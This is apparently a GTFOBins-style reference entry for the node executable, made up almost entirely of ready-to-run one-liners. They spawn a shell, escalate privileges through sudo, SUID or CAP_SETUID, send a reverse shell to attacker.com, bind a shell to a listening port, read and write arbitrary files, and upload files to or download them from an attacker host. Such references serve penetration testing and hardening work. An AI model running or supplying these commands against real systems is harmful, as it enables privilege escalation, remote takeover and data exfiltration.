This executable can spawn an interactive system shell.
This function can be performed by any unprivileged user.
node -e 'require("child_process").spawn("/bin/sh", {stdio: [0, 1, 2]})'This function is performed by the privileged user if executed via sudo because the acquired privileges are not dropped.
node -e 'require("child_process").spawn("/bin/sh", {stdio: [0, 1, 2]})'This function is performed by the privileged user if the executable has the SUID bit set and the right ownership because the effective privileges are not dropped.
node -e 'require("child_process").spawn("/bin/sh", ["-p"], {stdio: [0, 1, 2]})'This function is performed bypassing the usual kernel permission checks if the executable has certain capabilities set.
The following capabilities are needed: CAP_SETUID.
node -e 'process.setuid(0); require("child_process").spawn("/bin/sh", {stdio: [0, 1, 2]})'This executable can send back a reverse system shell to a listening attacker.
This function can be performed by any unprivileged user.
node -e 'sh = require("child_process").spawn("/bin/sh");
require("net").connect(12345, "attacker.com", function () {
this.pipe(sh.stdin);
sh.stdout.pipe(this);
sh.stderr.pipe(this);
})'This function is performed by the privileged user if executed via sudo because the acquired privileges are not dropped.
node -e 'sh = require("child_process").spawn("/bin/sh");
require("net").connect(12345, "attacker.com", function () {
this.pipe(sh.stdin);
sh.stdout.pipe(this);
sh.stderr.pipe(this);
})'This function is performed by the privileged user if the executable has the SUID bit set and the right ownership because the effective privileges are not dropped.
node -e 'sh = require("child_process").spawn("/bin/sh", ["-p"]);
require("net").connect(12345, "attacker.com", function () {
this.pipe(sh.stdin);
sh.stdout.pipe(this);
sh.stderr.pipe(this);
})'This executable can bind a system shell to a local port waiting for an attacker to connect.
This function can be performed by any unprivileged user.
node -e 'sh = require("child_process").spawn("/bin/sh");
require("net").createServer(function (client) {
client.pipe(sh.stdin);
sh.stdout.pipe(client);
sh.stderr.pipe(client);
}).listen(12345)'This function is performed by the privileged user if executed via sudo because the acquired privileges are not dropped.
node -e 'sh = require("child_process").spawn("/bin/sh");
require("net").createServer(function (client) {
client.pipe(sh.stdin);
sh.stdout.pipe(client);
sh.stderr.pipe(client);
}).listen(12345)'This function is performed by the privileged user if the executable has the SUID bit set and the right ownership because the effective privileges are not dropped.
node -e 'sh = require("child_process").spawn("/bin/sh", ["-p"]);
require("net").createServer(function (client) {
client.pipe(sh.stdin);
sh.stdout.pipe(client);
sh.stderr.pipe(client);
}).listen(12345)'This executable can write data to local files.
This function can be performed by any unprivileged user.
node -e 'require("fs").writeFileSync("/path/to/output-file", "DATA")'This function is performed by the privileged user if executed via sudo because the acquired privileges are not dropped.
node -e 'require("fs").writeFileSync("/path/to/output-file", "DATA")'This function is performed by the privileged user if the executable has the SUID bit set and the right ownership because the effective privileges are not dropped.
node -e 'require("fs").writeFileSync("/path/to/output-file", "DATA")'This executable can read data from local files.
This function can be performed by any unprivileged user.
node -e 'process.stdout.write(require("fs").readFileSync("/path/to/input-file"))'This function is performed by the privileged user if executed via sudo because the acquired privileges are not dropped.
node -e 'process.stdout.write(require("fs").readFileSync("/path/to/input-file"))'This function is performed by the privileged user if the executable has the SUID bit set and the right ownership because the effective privileges are not dropped.
node -e 'process.stdout.write(require("fs").readFileSync("/path/to/input-file"))'This executable can upload local data.
This function can be performed by any unprivileged user.
node -e 'require("fs").createReadStream("/path/to/input-file").pipe(require("http").request("http://attacker.com/path/to/output-file"))'This function is performed by the privileged user if executed via sudo because the acquired privileges are not dropped.
node -e 'require("fs").createReadStream("/path/to/input-file").pipe(require("http").request("http://attacker.com/path/to/output-file"))'This function is performed by the privileged user if the executable has the SUID bit set and the right ownership because the effective privileges are not dropped.
node -e 'require("fs").createReadStream("/path/to/input-file").pipe(require("http").request("http://attacker.com/path/to/output-file"))'This executable can download remote data.
This function can be performed by any unprivileged user.
node -e 'require("http").get("http://attacker.com/path/to/input-file", res => res.pipe(require("fs").createWriteStream("/path/to/output-file")))'This function is performed by the privileged user if executed via sudo because the acquired privileges are not dropped.
node -e 'require("http").get("http://attacker.com/path/to/input-file", res => res.pipe(require("fs").createWriteStream("/path/to/output-file")))'This function is performed by the privileged user if the executable has the SUID bit set and the right ownership because the effective privileges are not dropped.
node -e 'require("http").get("http://attacker.com/path/to/input-file", res => res.pipe(require("fs").createWriteStream("/path/to/output-file")))'